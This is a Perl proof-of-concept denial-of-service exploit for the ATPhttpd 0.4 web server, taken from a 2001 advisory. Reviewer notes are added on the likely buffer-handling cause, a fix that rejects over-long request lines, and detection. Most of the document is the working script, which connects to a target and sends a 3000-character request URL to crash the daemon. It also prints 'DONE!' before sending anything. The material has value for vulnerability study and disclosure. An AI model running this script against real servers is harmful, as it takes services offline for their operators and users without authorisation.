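#!/usr/bin/perl -w
#
# ATPhttpd 0.4 DoS Vulnerability
#
# Type:
# DoS, crashes Daemon
#
# Release Date:
# December 13, 2001
#
# Product / Vendor:
# ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is ideal
# for serving lots of static content, especially where disk I/O is expensive,
# such as NFS mounted web shares, or graphics servers.
# http://www.redshift.com/~yramin/atp/atphttpd/
#
# Summary:
# Server crashes after sending very long URL a few times.
# http://host/AAAAAAAAA...(Ax3000)...AAA
#
# Log:
# You may reach the core file through
# http://www.securityoffice.net/downloads/atphttpd.core
#
# Exploit:
# atphttpd.pl by Tamer Sahin
# http://www.securityoffice.net/downloads/atphttpd.pl
#
# Tested:
# OpenBSD 2.9 / ATPhttpd 0.4 Alpha release
#
# Vulnerable:
# ATPhttpd 0.4 Alpha release (And may be other)
#
# Disclaimer:
# http://securityoffice.net is not responsible for the misuse or illegal use
# of any of the information and/or the software listed on this security
# advisory.
#
# Author:
# Tamer Sahin
# ts@securityoffice.net
# http://www.securityoffice.net
#
# Reviewer notes:
# - The advisory states only that the daemon crashes on a very long request
#   URL; the root cause is not given here. Presumably the request line is
#   copied into a fixed-size buffer without a length check -- confirm against
#   the server source or the core file before classifying it further.
# - Server-side fix: bound the request line while reading it and answer
#   over-long requests with an error (HTTP 414) instead of parsing them.
# - Compensating control: a reverse proxy or filter in front of the daemon
#   that enforces a maximum request-line length.
# - Detection: request lines far longer than any path the site serves,
#   followed by a daemon restart or a fresh core file.
# - The two socket reads in the published listing had lost their <SOCK>
#   operators (markup stripping); they are restored below.

use strict;
use warnings;
use Socket;

die "ATPhttpd 0.4 DoS Vulnerability / Usage: $0 host port\n" if @ARGV < 2;

# NOTE: this banner is printed before any network activity, so it says
# nothing about whether the request was sent or how the server reacted.
print "DONE!\n\n";
print GetHTTP($ARGV[0], $ARGV[1]);
exit 0;

# GetHTTP($remote, $port)
#
# Sends one HTTP/1.0 GET whose request target is 3000 "A" characters to
# $remote:$port and returns the lines that follow the response headers.
#
#   $remote - host name or dotted-quad address of the server under test
#   $port   - numeric port, or a service name resolved via getservbyname
#
# Returns the list of body lines; the list is empty when the server closes
# the connection without finishing its headers (e.g. because it crashed).
# Dies on an unknown host or port and on any socket-level failure.
sub GetHTTP {
    # The original read the port from @ARGV and discarded its second
    # argument; the caller already passes the port here, so use it.
    my ($remote, $port) = @_;

    # Request target from the advisory: 3000 "A" characters.
    my $doc = "A" x 3000;

    if ($port =~ /\D/) {
        $port = getservbyname($port, 'tcp');
    }
    die "No port" unless $port;

    my $thisaddr = gethostbyname("localhost")
        or die "gethostbyname: cannot resolve localhost";
    my $thataddr = gethostbyname($remote)
        or die "gethostbyname: cannot resolve $remote";

    # sockaddr_in builds the platform's sockaddr layout, replacing the
    # hand-written pack template 'S n a4 x8'.
    my $this = sockaddr_in(0, $thisaddr);
    my $that = sockaddr_in($port, $thataddr);

    my $proto = getprotobyname('tcp');
    socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";

    # As in the original, the local end is bound to whatever address
    # "localhost" resolves to before connecting.
    bind($sock, $this)    or die "bind: $!";
    connect($sock, $that) or die "connect: $!";

    # Unbuffer the socket so the request is written immediately.
    my $previous = select($sock);
    $| = 1;
    select($previous);

    print {$sock} "GET $doc HTTP/1.0\n\n";

    # Skip the response headers. Stop at EOF as well as at the blank line:
    # if the daemon dies mid-response the read returns undef, and the
    # original do/until loop would never terminate in that case.
    while (defined(my $line = <$sock>)) {
        last if $line =~ /^\r\n/;
    }

    my @output = <$sock>;
    close($sock) or die "close: $!";
    return @output;
}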